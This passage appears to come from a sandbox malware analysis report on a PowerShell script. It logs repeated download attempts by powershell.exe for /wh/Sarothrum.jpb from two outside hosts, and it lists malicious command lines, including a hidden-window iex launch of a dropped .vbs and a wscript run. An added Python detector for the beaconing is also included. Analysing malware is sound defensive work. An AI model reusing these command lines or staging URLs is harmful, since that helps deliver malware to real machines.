    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:23 UTC | 121 | IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii:  Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 12    Source IP: 192.168.2.5    Source Port: 49880    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:28 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:29 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:29 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:29 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 13    Source IP: 192.168.2.5    Source Port: 49896    Destination IP: 148.251.114.233    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:34 UTC | 90 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:35 UTC | 238 | IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:35 GMT
    server: LiteSpeed
2024-12-05 09:39:35 UTC | 1130 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:35 UTC | 121 | IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii:  Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 14    Source IP: 192.168.2.5    Source Port: 49910    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:40 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:41 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:41 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:41 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 15    Source IP: 192.168.2.5    Source Port: 49922    Destination IP: 148.251.114.233    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:46 UTC | 90 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:47 UTC | 238 | IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:46 GMT
    server: LiteSpeed
2024-12-05 09:39:47 UTC | 1130 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:47 UTC | 121 | IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii:  Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 16    Source IP: 192.168.2.5    Source Port: 49937    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:52 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:52 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:52 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:52 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 17    Source IP: 192.168.2.5    Source Port: 49952    Destination IP: 148.251.114.233    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:58 UTC | 90 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:59 UTC | 238 | IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:58 GMT
    server: LiteSpeed
2024-12-05 09:39:59 UTC | 1130 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:59 UTC | 121 | IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii:  Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 18    Source IP: 192.168.2.5    Source Port: 49965    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:04 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:04 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:04 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:04 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use
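The sessions above all come from the same powershell.exe (PID 2956) and share one shape: a GET for /wh/Sarothrum.jpb carrying only Host and Connection headers (no User-Agent), sent to www.almrwad.com (184.171.244.231) and www.erp-royal-crown.info (148.251.114.233) in turn, roughly every six seconds (09:39:05, :11, :17, :23, :28, :34, ...), and answered 404 by both servers. Because every attempt in the window shown returned 404, the captured traffic contains no second-stage content; the report records the polling, not the payload. The following script is an added example, not part of the Joe Sandbox report: it parses records built from the rows above (the timestamps, hosts, IPs and PID are copied from the report; the one browser-style record for example.com is invented for contrast) and flags a process that polls one path across several hosts at a steady interval without a User-Agent. It also converts one of the report's "Data Raw" hex strings back to bytes.

```python
"""Added example (not from the report): detect fixed-interval, no-User-Agent
polling of one path across several hosts, as seen in the sessions above."""
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Constructed input: (session id, UTC timestamp, destination IP, PID,
# raw HTTP request, HTTP status). Values are copied from the report's rows;
# session 20 is an invented benign browser request used for contrast.
SAMPLE_SESSIONS = [
    (8, "2024-12-05 09:39:05", "184.171.244.231", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.almrwad.com\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    (9, "2024-12-05 09:39:11", "148.251.114.233", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    (10, "2024-12-05 09:39:17", "184.171.244.231", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.almrwad.com\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    (11, "2024-12-05 09:39:23", "148.251.114.233", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    (12, "2024-12-05 09:39:28", "184.171.244.231", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.almrwad.com\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    (13, "2024-12-05 09:39:34", "148.251.114.233", 2956,
     "GET /wh/Sarothrum.jpb HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\n"
     "Connection: Keep-Alive\r\n\r\n", 404),
    # Invented benign record (documentation IP, example.com): one request,
    # with a User-Agent, answered 200. It must not be flagged.
    (20, "2024-12-05 09:39:40", "203.0.113.10", 4100,
     "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
     "User-Agent: Mozilla/5.0\r\n\r\n", 200),
]


def decode_hex_dump(raw):
    """Convert one of the report's space-separated 'Data Raw' hex strings to bytes."""
    return bytes.fromhex(raw.replace(" ", ""))


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def find_beacons(sessions, min_requests=3, max_jitter_s=2.0):
    """Group requests by (PID, path); flag groups repeating at a near-constant gap.

    Each finding records the hosts contacted, the median gap in seconds, and
    whether every request lacked a User-Agent and every reply was a 404,
    which is exactly the pattern in the report's sessions.
    """
    groups = defaultdict(list)
    for _sid, ts, _dst, pid, raw, status in sessions:
        req = parse_request(raw)
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        groups[(pid, req["target"])].append((when, req["headers"], status))

    findings = []
    for (pid, target), rows in groups.items():
        if len(rows) < min_requests:
            continue
        rows.sort(key=lambda r: r[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(rows, rows[1:])]
        median = statistics.median(gaps)
        if max(abs(g - median) for g in gaps) > max_jitter_s:
            continue  # irregular timing: not the fixed-interval poll we are after
        findings.append({
            "pid": pid,
            "target": target,
            "count": len(rows),
            "hosts": sorted({h.get("host", "") for _, h, _ in rows}),
            "median_interval_s": median,
            "no_user_agent": all("user-agent" not in h for _, h, _ in rows),
            "all_404": all(s == 404 for _, _, s in rows),
        })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_SESSIONS):
        print(finding)
    # First bytes of the Apache 404 body from the report, decoded.
    print(decode_hex_dump("3c 21 44 4f 43 54 59 50 45").decode("latin-1"))
```

On the constructed input the detector returns a single finding for PID 2956 and /wh/Sarothrum.jpb: six requests across both hosts, a median gap of 6 s, no User-Agent on any of them, and a 404 on every one. On real proxy or sandbox logs the jitter threshold and minimum count are the knobs to tune; the missing User-Agent and the same path requested from unrelated domains are the parts of the pattern that survive a change of interval.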


                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                     19 | 192.168.2.5 | 49981 | 148.251.114.233 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                     2024-12-05 09:40:10 UTC | 90 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
                                                                     Host: www.erp-royal-crown.info
                                                                     Connection: Keep-Alive
                                                                     2024-12-05 09:40:10 UTC | 238 | IN | HTTP/1.1 404 Not Found
                                                                     Connection: close
                                                                     cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                     pragma: no-cache
                                                                     content-type: text/html
                                                                     content-length: 1251
                                                                     date: Thu, 05 Dec 2024 09:40:10 GMT
                                                                     server: LiteSpeed
                                                                     2024-12-05 09:40:10 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                     Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                     2024-12-05 09:40:10 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                     Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Target ID:0
                                                                    Start time:04:38:05
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:04:38:05
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:04:38:08
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:04:38:23
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs"
                                                                    Imagebase:0x7ff79b6f0000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:04:38:24
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
